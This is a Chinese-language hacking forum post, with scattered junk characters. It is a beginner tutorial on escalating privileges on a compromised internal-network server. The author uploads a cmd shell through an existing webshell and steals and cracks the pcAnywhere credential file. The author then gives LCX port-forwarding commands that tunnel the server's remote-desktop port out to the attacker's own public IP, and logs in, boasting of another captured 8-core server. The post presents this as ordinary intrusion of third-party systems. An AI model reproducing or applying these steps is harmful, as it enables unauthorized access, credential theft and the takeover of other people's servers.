- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。5 _& j4 z* E& ~* Y1 j
+ _8 k) }1 ?3 K提权方法:pcanywhere+LCX: a! \1 H% x9 Z4 _
# Q1 @2 B8 L5 K' x9 M
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。! |# @/ \/ M( C& c/ t. C; {2 N$ G
3 h% D' J+ b+ M
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
! ?9 I* c' B. E, Q; W1 J+ \% [# q o* f$ B# P4 R
* i! o* R4 V% S; C+ z( ~: n; M# s
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
5 y U, D' M; B4 a3 W
8 u$ p; Z8 ~% p# M& n' O: e2 Q6 T
# B* g1 v2 V% _呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
6 n6 G6 {3 I0 x" |& R# |' S7 l* _
2 X2 E2 ?4 [# G
& ^# B& L: k( w4 k6 L2 l. P1 E" G) ?5 o' @/ ^+ Y$ ?
. b* O) q" v6 ]' z+ p8 Z由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``) b4 e4 ^. D" e) G4 r8 m' s7 Q+ ?
6 ~) ^- f5 v/ P* M
7 x& P1 D; h2 N9 P1 NLCX的用法再简单说下:5 @0 V* ~5 D5 g; B( d/ I
/ H9 E- n2 T7 n服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)5 H: X, J) q5 H7 o5 E9 g
% a. v$ o1 X) y9 `: m( @! e# O: E" @本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)! b6 r- g6 v$ k; j: r
( y; [5 Z0 m) b8 E由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
+ B4 g9 `5 S; c8 D" b2 c顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
& V) S& D0 V. B9 @
6 L& S8 R, S9 p5 V1 K0 z
9 Z& W S% u+ m; L3 w# u% W4 u% P7 c0 H0 N
" S+ K/ m0 q3 @
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。& v4 b/ N1 q/ b
7 }# d4 o4 o' {# y2 `* z
7 [9 l6 S& F* c5 j. x
; P1 G) S) ]6 e
; _# W5 X) }0 C" v- a我们本地连接试试,输入我们刚破解的账号密码+ `; Z: T* Q" K; M. c! N" ~9 c
) ?" G; Y9 z. z) x
5 C$ \, ~1 E5 M2 k7 i. J5 {呵呵``连接成功,服务器不错,又一个8核^︵^
! s, o4 E* u( c* |+ A* z+ q1 a6 \+ w0 t9 h, {8 f* X: Y- T. K% L
% X) X2 Z; q; M8 i7 D2 J
) g; u; ^3 ?! Z9 R! `/ X
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|